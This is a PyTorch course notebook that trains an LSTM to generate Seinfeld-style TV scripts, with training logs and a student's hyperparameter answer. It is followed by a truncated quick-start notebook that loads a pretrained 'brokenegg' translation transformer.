You're encouraged to lok at the code for `preprocess_and_save_data` in the `helpers.py` file to see what it's doing in detail, but you do not need to change this code.", "_____no_output_____" ] ], [ [ "\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\n# pre-process training data\nhelper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables)", "_____no_output_____" ] ], [ [ "# Check Point\nThis is your first checkpoint. If you ever decide to come back to this notebook or have to restart the notebook, you can start from here. The preprocessed data has been saved to disk.", "_____no_output_____" ] ], [ [ "\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nimport helper\nimport problem_unittests as tests\n\nint_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()", "_____no_output_____" ] ], [ [ "## Build the Neural Network\nIn this section, you'll build the components necessary to build an RNN by implementing the RNN Module and forward and backpropagation functions.\n\n### Check Access to GPU", "_____no_output_____" ] ], [ [ "\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nimport torch\n\n# Check for a GPU\ntrain_on_gpu = torch.cuda.is_available()\nif not train_on_gpu:\n print('No GPU found. Please use a GPU to train your neural network.')", "_____no_output_____" ] ], [ [ "## Input\nLet's start with the preprocessed input data. We'll use [TensorDataset](http://pytorch.org/docs/master/data.html#torch.utils.data.TensorDataset) to provide a known format to our dataset; in combination with [DataLoader](http://pytorch.org/docs/master/data.html#torch.utils.data.DataLoader), it will handle batching, shuffling, and other dataset iteration functions.\n\nYou can create data with TensorDataset by passing in feature and target tensors. 
Then create a DataLoader as usual.\n```\ndata = TensorDataset(feature_tensors, target_tensors)\ndata_loader = torch.utils.data.DataLoader(data, \n batch_size=batch_size)\n```\n\n### Batching\nImplement the `batch_data` function to batch `words` data into chunks of size `batch_size` using the `TensorDataset` and `DataLoader` classes.\n\n>You can batch words using the DataLoader, but it will be up to you to create `feature_tensors` and `target_tensors` of the correct size and content for a given `sequence_length`.\n\nFor example, say we have these as input:\n```\nwords = [1, 2, 3, 4, 5, 6, 7]\nsequence_length = 4\n```\n\nYour first `feature_tensor` should contain the values:\n```\n[1, 2, 3, 4]\n```\nAnd the corresponding `target_tensor` should just be the next \"word\"/tokenized word value:\n```\n5\n```\nThis should continue with the second `feature_tensor`, `target_tensor` being:\n```\n[2, 3, 4, 5] # features\n6 # target\n```", "_____no_output_____" ] ], [ [ "from torch.utils.data import TensorDataset, DataLoader\n\n\ndef batch_data(words, sequence_length, batch_size):\n \"\"\"\n Batch the neural network data using DataLoader\n :param words: The word ids of the TV scripts\n :param sequence_length: The sequence length of each batch\n :param batch_size: The size of each batch; the number of sequences in a batch\n :return: DataLoader with batched data\n \"\"\"\n # TODO: Implement function\n \n features = []\n targets = []\n \n print(words, sequence_length, batch_size)\n for start in range(len(words) - sequence_length):\n end = start + sequence_length\n \n features.append(words[start:end])\n targets.append(words[end])\n\n data = TensorDataset(torch.tensor(features), torch.tensor(targets))\n data_loader = DataLoader(data, batch_size, True)\n\n # return a dataloader\n return data_loader\n\n# there is no test for this function, but you are encouraged to create\n# print statements and tests of your own\n", "_____no_output_____" ] ], [ [ "### Test your dataloader \n\nYou'll have to modify this code to test a batching function, but it should look fairly similar.\n\nBelow, we're generating some test text data and defining a dataloader using the function you defined, above. Then, we are getting some sample batch of inputs `sample_x` and targets `sample_y` from our dataloader.\n\nYour code should return something like the following (likely in a different order, if you shuffled your data):\n\n```\ntorch.Size([10, 5])\ntensor([[ 28, 29, 30, 31, 32],\n [ 21, 22, 23, 24, 25],\n [ 17, 18, 19, 20, 21],\n [ 34, 35, 36, 37, 38],\n [ 11, 12, 13, 14, 15],\n [ 23, 24, 25, 26, 27],\n [ 6, 7, 8, 9, 10],\n [ 38, 39, 40, 41, 42],\n [ 25, 26, 27, 28, 29],\n [ 7, 8, 9, 10, 11]])\n\ntorch.Size([10])\ntensor([ 33, 26, 22, 39, 16, 28, 11, 43, 30, 12])\n```\n\n### Sizes\nYour sample_x should be of size `(batch_size, sequence_length)` or (10, 5) in this case and sample_y should just have one dimension: batch_size (10). \n\n### Values\n\nYou should also notice that the targets, sample_y, are the *next* value in the ordered test_text data. 
So, for an input sequence `[ 28, 29, 30, 31, 32]` that ends with the value `32`, the corresponding output should be `33`.", "_____no_output_____" ] ], [ [ "# test dataloader\n\ntest_text = range(50)\nt_loader = batch_data(test_text, sequence_length=5, batch_size=10)\n\ndata_iter = iter(t_loader)\nsample_x, sample_y = data_iter.next()\n\nprint(sample_x.shape)\nprint(sample_x)\nprint()\nprint(sample_y.shape)\nprint(sample_y)", "range(0, 50) 5 10\ntorch.Size([10, 5])\ntensor([[ 18, 19, 20, 21, 22],\n [ 42, 43, 44, 45, 46],\n [ 41, 42, 43, 44, 45],\n [ 1, 2, 3, 4, 5],\n [ 15, 16, 17, 18, 19],\n [ 32, 33, 34, 35, 36],\n [ 26, 27, 28, 29, 30],\n [ 30, 31, 32, 33, 34],\n [ 39, 40, 41, 42, 43],\n [ 4, 5, 6, 7, 8]])\n\ntorch.Size([10])\ntensor([ 23, 47, 46, 6, 20, 37, 31, 35, 44, 9])\n" ] ], [ [ "---\n## Build the Neural Network\nImplement an RNN using PyTorch's [Module class](http://pytorch.org/docs/master/nn.html#torch.nn.Module). You may choose to use a GRU or an LSTM. To complete the RNN, you'll have to implement the following functions for the class:\n - `__init__` - The initialize function. \n - `init_hidden` - The initialization function for an LSTM/GRU hidden state\n - `forward` - Forward propagation function.\n \nThe initialize function should create the layers of the neural network and save them to the class. The forward propagation function will use these layers to run forward propagation and generate an output and a hidden state.\n\n**The output of this model should be the *last* batch of word scores** after a complete sequence has been processed. That is, for each input sequence of words, we only want to output the word scores for a single, most likely, next word.\n\n### Hints\n\n1. Make sure to stack the outputs of the lstm to pass to your fully-connected layer, you can do this with `lstm_output = lstm_output.contiguous().view(-1, self.hidden_dim)`\n2. 
You can get the last batch of word scores by shaping the output of the final, fully-connected layer like so:\n\n```\n# reshape into (batch_size, seq_length, output_size)\noutput = output.view(batch_size, -1, self.output_size)\n# get last batch\nout = output[:, -1]\n```", "_____no_output_____" ] ], [ [ "import torch.nn as nn\n\nclass RNN(nn.Module):\n \n def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5):\n \"\"\"\n Initialize the PyTorch RNN Module\n :param vocab_size: The number of input dimensions of the neural network (the size of the vocabulary)\n :param output_size: The number of output dimensions of the neural network\n :param embedding_dim: The size of embeddings, should you choose to use them \n :param hidden_dim: The size of the hidden layer outputs\n :param dropout: dropout to add in between LSTM/GRU layers\n \"\"\"\n super(RNN, self).__init__()\n # TODO: Implement function\n\n # set class variables\n self.output_size = output_size\n self.n_layers = n_layers\n self.hidden_dim = hidden_dim\n # define model layers\n self.embed = nn.Embedding(vocab_size, embedding_dim)\n self.rnn = nn.LSTM(embedding_dim, self.hidden_dim, self.n_layers, dropout=dropout, batch_first=True)\n self.fc = nn.Linear(self.hidden_dim, self.output_size)\n \n def forward(self, nn_input, hidden):\n \"\"\"\n Forward propagation of the neural network\n :param nn_input: The input to the neural network\n :param hidden: The hidden state \n :return: Two Tensors, the output of the neural network and the latest hidden state\n \"\"\"\n # TODO: Implement function\n x = self.embed(nn_input)\n x, hidden = self.rnn(x, hidden)\n x = x.contiguous().view(-1, self.hidden_dim)\n x = self.fc(x)\n x = x.view(nn_input.size(0), -1, self.output_size)[:, -1]\n # return one batch of output word scores and the hidden state\n return x, hidden\n \n \n def init_hidden(self, batch_size):\n '''\n Initialize the hidden state of an LSTM/GRU\n :param batch_size: The batch_size of the hidden state\n :return: hidden state of dims (n_layers, batch_size, hidden_dim)\n '''\n # Implement function\n \n # initialize hidden state with zero weights, and move to GPU if available\n weight = next(self.parameters()).data\n\n hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(),\n weight.new(self.n_layers, batch_size, self.hidden_dim).zero_())\n\n if train_on_gpu:\n hidden = (hidden[0].cuda(), hidden[1].cuda())\n\n return hidden\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_rnn(RNN, train_on_gpu)", "Tests Passed\n" ] ], [ [ "### Define forward and backpropagation\n\nUse the RNN class you implemented to apply forward and back propagation. This function will be called, iteratively, in the training loop as follows:\n```\nloss = forward_back_prop(decoder, decoder_optimizer, criterion, inp, target)\n```\n\nAnd it should return the average loss over a batch and the hidden state returned by a call to `RNN(inp, hidden)`. 
Recall that you can get this loss by computing it, as usual, and calling `loss.item()`.\n\n**If a GPU is available, you should move your data to that GPU device, here.**", "_____no_output_____" ] ], [ [ "def forward_back_prop(rnn, optimizer, criterion, inp, target, hidden):\n \"\"\"\n Forward and backward propagation on the neural network\n :param decoder: The PyTorch Module that holds the neural network\n :param decoder_optimizer: The PyTorch optimizer for the neural network\n :param criterion: The PyTorch loss function\n :param inp: A batch of input to the neural network\n :param target: The target output for the batch of input\n :return: The loss and the latest hidden state Tensor\n \"\"\"\n \n # TODO: Implement Function\n\n # move data to GPU, if available\n if train_on_gpu:\n inp, target = inp.cuda(), target.cuda()\n\n # perform backpropagation and optimization\n hidden = tuple([each.data for each in hidden])\n\n optimizer.zero_grad()\n rnn.zero_grad()\n \n output, hidden = rnn(inp, hidden)\n \n loss = criterion(output, target)\n loss.backward()\n\n nn.utils.clip_grad_norm_(rnn.parameters(), 5)\n optimizer.step()\n\n # return the loss over a batch and the hidden state produced by our model\n return loss.item(), hidden\n\n# Note that these tests aren't completely extensive.\n# they are here to act as general checks on the expected outputs of your functions\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_forward_back_prop(RNN, forward_back_prop, train_on_gpu)", "Tests Passed\n" ] ], [ [ "## Neural Network Training\n\nWith the structure of the network complete and data ready to be fed in the neural network, it's time to train it.\n\n### Train Loop\n\nThe training loop is implemented for you in the `train_decoder` function. This function will train the network over all the batches for the number of epochs given. The model progress will be shown every number of batches. This number is set with the `show_every_n_batches` parameter. 
You'll set this parameter along with other parameters in the next section.", "_____no_output_____" ] ], [ [ "\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\n\ndef train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100):\n batch_losses = []\n \n rnn.train()\n\n print(\"Training for %d epoch(s)...\" % n_epochs)\n for epoch_i in range(1, n_epochs + 1):\n \n # initialize hidden state\n hidden = rnn.init_hidden(batch_size)\n \n for batch_i, (inputs, labels) in enumerate(train_loader, 1):\n \n # make sure you iterate over completely full batches, only\n n_batches = len(train_loader.dataset)//batch_size\n if(batch_i > n_batches):\n break\n \n # forward, back prop\n loss, hidden = forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden) \n # record loss\n batch_losses.append(loss)\n\n # printing loss stats\n if batch_i % show_every_n_batches == 0:\n print('Epoch: {:>4}/{:<4} Loss: {}\\n'.format(\n epoch_i, n_epochs, np.average(batch_losses)))\n batch_losses = []\n\n # returns a trained rnn\n return rnn", "_____no_output_____" ] ], [ [ "### Hyperparameters\n\nSet and train the neural network with the following parameters:\n- Set `sequence_length` to the length of a sequence.\n- Set `batch_size` to the batch size.\n- Set `num_epochs` to the number of epochs to train for.\n- Set `learning_rate` to the learning rate for an Adam optimizer.\n- Set `vocab_size` to the number of uniqe tokens in our vocabulary.\n- Set `output_size` to the desired size of the output.\n- Set `embedding_dim` to the embedding dimension; smaller than the vocab_size.\n- Set `hidden_dim` to the hidden dimension of your RNN.\n- Set `n_layers` to the number of layers/cells in your RNN.\n- Set `show_every_n_batches` to the number of batches at which the neural network should print progress.\n\nIf the network isn't getting the desired results, tweak these parameters and/or the layers in the `RNN` class.", "_____no_output_____" ] ], [ [ "# Data params\n# Sequence Length\nsequence_length = 8 # of words in a sequence\n# Batch Size\nbatch_size = 128\n\n# data loader - do not change\ntrain_loader = batch_data(int_text, sequence_length, batch_size)", "IOPub data rate exceeded.\nThe notebook server will temporarily stop sending output\nto the client in order to avoid crashing it.\nTo change this limit, set the config variable\n`--NotebookApp.iopub_data_rate_limit`.\n\nCurrent values:\nNotebookApp.iopub_data_rate_limit=1000000.0 (bytes/sec)\nNotebookApp.rate_limit_window=3.0 (secs)\n\n" ], [ "# Training parameters\n# Number of Epochs\nnum_epochs = 9\n# Learning Rate\nlearning_rate = 0.001\n\n# Model parameters\n# Vocab size\nvocab_size = len(vocab_to_int)\n# Output size\noutput_size = vocab_size\n# Embedding Dimension\nembedding_dim = 256\n# Hidden Dimension\nhidden_dim = 512\n# Number of RNN Layers\nn_layers = 3\n\n# Show stats for every n number of batches\nshow_every_n_batches = 500", "_____no_output_____" ] ], [ [ "### Train\nIn the next cell, you'll train the neural network on the pre-processed data. If you have a hard time getting a good loss, you may consider changing your hyperparameters. In general, you may get better results with larger hidden and n_layer dimensions, but larger models take a longer time to train. 
\n> **You should aim for a loss less than 3.5.** \n\nYou should also experiment with different sequence lengths, which determine the size of the long range dependencies that a model can learn.", "_____no_output_____" ] ], [ [ "\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\n\n# create model and move to gpu if available\nrnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5)\nif train_on_gpu:\n rnn.cuda()\n\n# defining loss and optimization functions for training\noptimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate)\ncriterion = nn.CrossEntropyLoss()\n\n# training the model\ntrained_rnn = train_rnn(rnn, batch_size, optimizer, criterion, num_epochs, show_every_n_batches)\n\n# saving the trained model\nhelper.save_model('./save/trained_rnn', trained_rnn)\nprint('Model Trained and Saved')", "Training for 9 epoch(s)...\nEpoch: 1/9 Loss: 5.9196070919036865\n\nEpoch: 1/9 Loss: 5.154569608688354\n\nEpoch: 1/9 Loss: 4.861867110252381\n\nEpoch: 1/9 Loss: 4.663630374908447\n\nEpoch: 1/9 Loss: 4.568453297615052\n\nEpoch: 1/9 Loss: 4.501800373077392\n\nEpoch: 1/9 Loss: 4.4400984477996825\n\nEpoch: 1/9 Loss: 4.407389422893524\n\nEpoch: 1/9 Loss: 4.359781648635864\n\nEpoch: 1/9 Loss: 4.311809137821197\n\nEpoch: 1/9 Loss: 4.285976921081543\n\nEpoch: 1/9 Loss: 4.265631782531738\n\nEpoch: 1/9 Loss: 4.228047152042389\n\nEpoch: 2/9 Loss: 4.1530766147578095\n\nEpoch: 2/9 Loss: 4.056858470439911\n\nEpoch: 2/9 Loss: 4.049036991596222\n\nEpoch: 2/9 Loss: 4.028184664726258\n\nEpoch: 2/9 Loss: 4.027896447658539\n\nEpoch: 2/9 Loss: 3.99689031124115\n\nEpoch: 2/9 Loss: 3.996437876701355\n\nEpoch: 2/9 Loss: 3.978628529548645\n\nEpoch: 2/9 Loss: 4.00464665555954\n\nEpoch: 2/9 Loss: 3.986073437690735\n\nEpoch: 2/9 Loss: 3.9736593861579896\n\nEpoch: 2/9 Loss: 3.9845535202026365\n\nEpoch: 2/9 Loss: 3.9533566370010376\n\nEpoch: 3/9 Loss: 3.887317371565245\n\nEpoch: 3/9 Loss: 3.7951194486618043\n\nEpoch: 3/9 Loss: 3.7917876377105713\n\nEpoch: 3/9 Loss: 3.7811633620262146\n\nEpoch: 3/9 Loss: 3.7886141839027405\n\nEpoch: 3/9 Loss: 3.8130338320732116\n\nEpoch: 3/9 Loss: 3.8106535000801087\n\nEpoch: 3/9 Loss: 3.8175085015296935\n\nEpoch: 3/9 Loss: 3.784125514984131\n\nEpoch: 3/9 Loss: 3.797453468799591\n\nEpoch: 3/9 Loss: 3.80401885843277\n\nEpoch: 3/9 Loss: 3.808668386936188\n\nEpoch: 3/9 Loss: 3.8207490234375\n\nEpoch: 4/9 Loss: 3.7332648527265455\n\nEpoch: 4/9 Loss: 3.634948308467865\n\nEpoch: 4/9 Loss: 3.647617848396301\n\nEpoch: 4/9 Loss: 3.6423205795288087\n\nEpoch: 4/9 Loss: 3.64229798412323\n\nEpoch: 4/9 Loss: 3.647725365638733\n\nEpoch: 4/9 Loss: 3.6609289746284484\n\nEpoch: 4/9 Loss: 3.6745360856056215\n\nEpoch: 4/9 Loss: 3.6791053624153136\n\nEpoch: 4/9 Loss: 3.6619578566551207\n\nEpoch: 4/9 Loss: 3.6766717824935915\n\nEpoch: 4/9 Loss: 3.678693187713623\n\nEpoch: 4/9 Loss: 3.694414616584778\n\nEpoch: 5/9 Loss: 3.5895329953716266\n\nEpoch: 5/9 Loss: 3.5111766138076783\n\nEpoch: 5/9 Loss: 3.5191890153884886\n\nEpoch: 5/9 Loss: 3.5270044150352478\n\nEpoch: 5/9 Loss: 3.5389353365898133\n\nEpoch: 5/9 Loss: 3.546943061828613\n\nEpoch: 5/9 Loss: 3.5659065365791323\n\nEpoch: 5/9 Loss: 3.5496874227523803\n\nEpoch: 5/9 Loss: 3.5708318347930907\n\nEpoch: 5/9 Loss: 3.5583040256500245\n\nEpoch: 5/9 Loss: 3.572103688716888\n\nEpoch: 5/9 Loss: 3.583995021343231\n\nEpoch: 5/9 Loss: 3.5945741410255434\n\nEpoch: 6/9 Loss: 3.508891934580847\n\nEpoch: 6/9 Loss: 3.4223804202079773\n\nEpoch: 6/9 Loss: 3.4277972531318666\n\nEpoch: 6/9 Loss: 3.4104116830825806\n\nEpoch: 6/9 Loss: 
3.455143273830414\n\nEpoch: 6/9 Loss: 3.4551423745155336\n\nEpoch: 6/9 Loss: 3.446984980583191\n\nEpoch: 6/9 Loss: 3.4660440020561216\n\nEpoch: 6/9 Loss: 3.490551306247711\n\nEpoch: 6/9 Loss: 3.4813959879875185\n\nEpoch: 6/9 Loss: 3.5088824620246886\n\nEpoch: 6/9 Loss: 3.50870436668396\n\nEpoch: 6/9 Loss: 3.512404335975647\n\nEpoch: 7/9 Loss: 3.42333300760779\n\nEpoch: 7/9 Loss: 3.3405881376266477\n\nEpoch: 7/9 Loss: 3.349756766796112\n\nEpoch: 7/9 Loss: 3.3535381975173952\n\nEpoch: 7/9 Loss: 3.3849702200889586\n\nEpoch: 7/9 Loss: 3.3748793692588808\n\nEpoch: 7/9 Loss: 3.400786780834198\n\nEpoch: 7/9 Loss: 3.4115707964897157\n\nEpoch: 7/9 Loss: 3.4002523488998415\n\nEpoch: 7/9 Loss: 3.4308757686614992\n\nEpoch: 7/9 Loss: 3.403478935718536\n\nEpoch: 7/9 Loss: 3.4190732889175415\n\nEpoch: 7/9 Loss: 3.436656415462494\n\nEpoch: 8/9 Loss: 3.3615086432950045\n\nEpoch: 8/9 Loss: 3.2641971321105956\n\nEpoch: 8/9 Loss: 3.283445837497711\n\nEpoch: 8/9 Loss: 3.2901403641700746\n\nEpoch: 8/9 Loss: 3.3264351720809935\n\nEpoch: 8/9 Loss: 3.3202496209144594\n\nEpoch: 8/9 Loss: 3.3229446692466738\n\nEpoch: 8/9 Loss: 3.3508189005851747\n\nEpoch: 8/9 Loss: 3.3521045947074892\n\nEpoch: 8/9 Loss: 3.346731041908264\n\nEpoch: 8/9 Loss: 3.3734106063842773\n\nEpoch: 8/9 Loss: 3.379966462612152\n\nEpoch: 8/9 Loss: 3.38812366771698\n\nEpoch: 9/9 Loss: 3.2891932857540986\n\nEpoch: 9/9 Loss: 3.213767638206482\n\nEpoch: 9/9 Loss: 3.239010145187378\n\nEpoch: 9/9 Loss: 3.2513397607803345\n\nEpoch: 9/9 Loss: 3.258533630371094\n\nEpoch: 9/9 Loss: 3.2619752712249754\n\nEpoch: 9/9 Loss: 3.275171920776367\n\nEpoch: 9/9 Loss: 3.2787757329940797\n\nEpoch: 9/9 Loss: 3.28660843372345\n\nEpoch: 9/9 Loss: 3.293291466712952\n\nEpoch: 9/9 Loss: 3.327093819618225\n\nEpoch: 9/9 Loss: 3.320905412197113\n\nEpoch: 9/9 Loss: 3.3482332491874693\n\n" ] ], [ [ "### Question: How did you decide on your model hyperparameters? \nFor example, did you try different sequence_lengths and find that one size made the model converge faster? What about your hidden_dim and n_layers; how did you decide on those?", "_____no_output_____" ], [ "**Answer:** Most of the params were selected based on community input gathered from online sources. Sequence length was a little special in that I could not find many suggestions online, I tested, 4, 6, 8, 16, 32, 64, 128, and 1024 length sequences. I found that smaller sequences where effective, but I am not conclusive. 8 achieved the best results in a fairly short time.\n\nI also tested other params like hidden dims and layers, etc. The conclusion was that higher embedding dims did not improve performance, while higher hidden dims did, 2-3 layers seems to offer little difference in performance.", "_____no_output_____" ], [ "---\n# Checkpoint\n\nAfter running the above training cell, your model will be saved by name, `trained_rnn`, and if you save your notebook progress, **you can pause here and come back to this code at another time**. 
You can resume your progress by running the next cell, which will load in our word:id dictionaries _and_ load in your saved model by name!", "_____no_output_____" ] ], [ [ "\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nimport torch\nimport helper\nimport problem_unittests as tests\n\n_, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()\ntrained_rnn = helper.load_model('./save/trained_rnn')", "_____no_output_____" ] ], [ [ "## Generate TV Script\nWith the network trained and saved, you'll use it to generate a new, \"fake\" Seinfeld TV script in this section.\n\n### Generate Text\nTo generate the text, the network needs to start with a single word and repeat its predictions until it reaches a set length. You'll be using the `generate` function to do this. It takes a word id to start with, `prime_id`, and generates a set length of text, `predict_len`. Also note that it uses topk sampling to introduce some randomness in choosing the most likely next word, given an output set of word scores!", "_____no_output_____" ] ], [ [ "\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\nimport torch.nn.functional as F\n\ndef generate(rnn, prime_id, int_to_vocab, token_dict, pad_value, predict_len=100):\n \"\"\"\n Generate text using the neural network\n :param decoder: The PyTorch Module that holds the trained neural network\n :param prime_id: The word id to start the first prediction\n :param int_to_vocab: Dict of word id keys to word values\n :param token_dict: Dict of puncuation tokens keys to puncuation values\n :param pad_value: The value used to pad a sequence\n :param predict_len: The length of text to generate\n :return: The generated text\n \"\"\"\n rnn.eval()\n \n # create a sequence (batch_size=1) with the prime_id\n current_seq = np.full((1, sequence_length), pad_value)\n current_seq[-1][-1] = prime_id\n predicted = [int_to_vocab[prime_id]]\n \n for _ in range(predict_len):\n if train_on_gpu:\n current_seq = torch.LongTensor(current_seq).cuda()\n else:\n current_seq = torch.LongTensor(current_seq)\n \n # initialize the hidden state\n hidden = rnn.init_hidden(current_seq.size(0))\n \n # get the output of the rnn\n output, _ = rnn(current_seq, hidden)\n \n # get the next word probabilities\n p = F.softmax(output, dim=1).data\n if(train_on_gpu):\n p = p.cpu() # move to cpu\n \n # use top_k sampling to get the index of the next word\n top_k = 5\n p, top_i = p.topk(top_k)\n top_i = top_i.numpy().squeeze()\n \n # select the likely next word index with some element of randomness\n p = p.numpy().squeeze()\n word_i = np.random.choice(top_i, p=p/p.sum())\n \n # retrieve that word from the dictionary\n word = int_to_vocab[word_i]\n predicted.append(word) \n \n # the generated word becomes the next \"current sequence\" and the cycle can continue\n current_seq = np.roll(current_seq, -1, 1)\n current_seq[-1][-1] = word_i\n \n gen_sentences = ' '.join(predicted)\n \n # Replace punctuation tokens\n for key, token in token_dict.items():\n ending = ' ' if key in ['\\n', '(', '\"'] else ''\n gen_sentences = gen_sentences.replace(' ' + token.lower(), key)\n gen_sentences = gen_sentences.replace('\\n ', '\\n')\n gen_sentences = gen_sentences.replace('( ', '(')\n \n # return all the sentences\n return gen_sentences", "_____no_output_____" ] ], [ [ "### Generate a New Script\nIt's time to generate the text. 
Set `gen_length` to the length of TV script you want to generate and set `prime_word` to one of the following to start the prediction:\n- \"jerry\"\n- \"elaine\"\n- \"george\"\n- \"kramer\"\n\nYou can set the prime word to _any word_ in our dictionary, but it's best to start with a name for generating a TV script. (You can also start with any other names you find in the original text file!)", "_____no_output_____" ] ], [ [ "import numpy as np\n# run the cell multiple times to get different results!\ngen_length = 400 # modify the length to your preference\nprime_word = 'jerry' # name for starting the script\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\npad_word = helper.SPECIAL_WORDS['PADDING']\ngenerated_script = generate(trained_rnn, vocab_to_int[prime_word + ':'], int_to_vocab, token_dict, vocab_to_int[pad_word], gen_length)\nprint(generated_script)", "/opt/conda/lib/python3.6/site-packages/ipykernel_launcher.py:35: UserWarning: RNN module weights are not part of single contiguous chunk of memory. This means they need to be compacted at every call, possibly greatly increasing memory usage. To compact weights again call flatten_parameters().\n" ] ], [ [ "#### Save your favorite scripts\n\nOnce you have a script that you like (or find interesting), save it to a text file!", "_____no_output_____" ] ], [ [ "# save script to a text file\nf = open(\"generated_script_1.txt\",\"w\")\nf.write(generated_script)\nf.close()", "_____no_output_____" ] ], [ [ "# The TV Script is Not Perfect\nIt's ok if the TV script doesn't make perfect sense. It should look like alternating lines of dialogue, here is one such example of a few generated lines.\n\n### Example generated script\n\n>jerry: what about me?\n>\n>jerry: i don't have to wait.\n>\n>kramer:(to the sales table)\n>\n>elaine:(to jerry) hey, look at this, i'm a good doctor.\n>\n>newman:(to elaine) you think i have no idea of this...\n>\n>elaine: oh, you better take the phone, and he was a little nervous.\n>\n>kramer:(to the phone) hey, hey, jerry, i don't want to be a little bit.(to kramer and jerry) you can't.\n>\n>jerry: oh, yeah. i don't even know, i know.\n>\n>jerry:(to the phone) oh, i know.\n>\n>kramer:(laughing) you know...(to jerry) you don't know.\n\nYou can see that there are multiple characters that say (somewhat) complete sentences, but it doesn't have to be perfect! It takes quite a while to get good results, and often, you'll have to use a smaller vocabulary (and discard uncommon words), or get more data. The Seinfeld dataset is about 3.4 MB, which is big enough for our purposes; for script generation you'll want more than 1 MB of text, generally. \n\n# Submitting This Project\nWhen submitting this project, make sure to run all the cells before saving the notebook. Save the notebook file as \"dlnd_tv_script_generation.ipynb\" and save another copy as an HTML file by clicking \"File\" -> \"Download as..\"->\"html\". Include the \"helper.py\" and \"problem_unittests.py\" files in your submission. Once you download these files, compress them into one zip file for submission.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
cb205be94f3a467a685f1134c3e2dcdbfbbe26b5
6,310
ipynb
Jupyter Notebook
examples/quick_start.ipynb
brokenegg/transformer
c402ccffd6be1e01c589ad2b9064a5837d4464c7
[ "Apache-2.0" ]
null
null
null
examples/quick_start.ipynb
brokenegg/transformer
c402ccffd6be1e01c589ad2b9064a5837d4464c7
[ "Apache-2.0" ]
null
null
null
examples/quick_start.ipynb
brokenegg/transformer
c402ccffd6be1e01c589ad2b9064a5837d4464c7
[ "Apache-2.0" ]
null
null
null
27.434783
185
0.561014
[ [ [ "# BrokenEgg Transformer quick start\n\n[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/brokenegg/transformer/blob/master/examples/quick_start.ipynb)", "_____no_output_____" ] ], [ [ "!pip install git+https://github.com/brokenegg/transformer.git", "_____no_output_____" ], [ "%%shell\ngsutil cp gs://brokenegg/pretrained/model_base_20200623.tar.bz2 .\ntar xfj model_base_20200623.tar.bz2", "Copying gs://brokenegg/pretrained/model_base_20200623.tar.bz2...\n| [1 files][819.1 MiB/819.1 MiB] 53.6 MiB/s \nOperation completed over 1 objects/819.1 MiB. \n" ], [ "from brokenegg_transformer import transformer\nfrom brokenegg_transformer import model_params\nfrom brokenegg_transformer.utils import tokenizer\nimport tensorflow.compat.v1 as tf\nimport numpy as np", "_____no_output_____" ], [ "# Creating translation model\nparams = model_params.BASE_PARAMS.copy()\nparams[\"dtype\"] = tf.float32\nwith tf.name_scope(\"model\"):\n model = transformer.create_model(params, is_train=False, has_initial_ids=True)\ninit_weight_path = tf.train.latest_checkpoint(\"./model_base_20200623\")\nprint('Restoring from %s' % init_weight_path)\ncheckpoint = tf.train.Checkpoint(model=model)\ncheckpoint.restore(init_weight_path)", "Restoring from ./model_base_20200623/ctl_step_760000.ckpt-38\n" ], [ "# Creating tokenizer\npath = './model_base_20200623/brokenegg.en-es-ja.spm64k.model'\nsubtokenizer = tokenizer.Subtokenizer(path)", "INFO:tensorflow:Initializing Subtokenizer from file ./model_base_20200623/brokenegg.en-es-ja.spm64k.model.\n" ], [ "#text = 'US is located in the west.'\ntext = 'Hello! I am going to school.'\n#text = 'Note: this transformer folder is subject to be integrated into official/nlp folder.'\ntext = 'They include President Trump\\'s former lawyer Michael Cohen who has served a prison sentence for lying to Congress and campaign finance fraud.'\n#text = '元気ですか?'\n#text = 'Are you sure?'\n#text = '¿Estás seguro?'\n#text = 'どこ行こうか?'\ntext = '愛している'\n\n# task_id is one of 1, 64000, 64001, 64002\n# 1: Conversation\n# 64000: Translate from Spanish/Japanese to English\n# 64001: Translate from English/Japanese to English\n# 64002: Translate from English/Spanishe to Japanese\n\ntask_id = 1\nencoded = subtokenizer.encode(text, add_eos=True)\noutput, score = model.predict([np.array([encoded], dtype=np.int64), np.array([task_id], 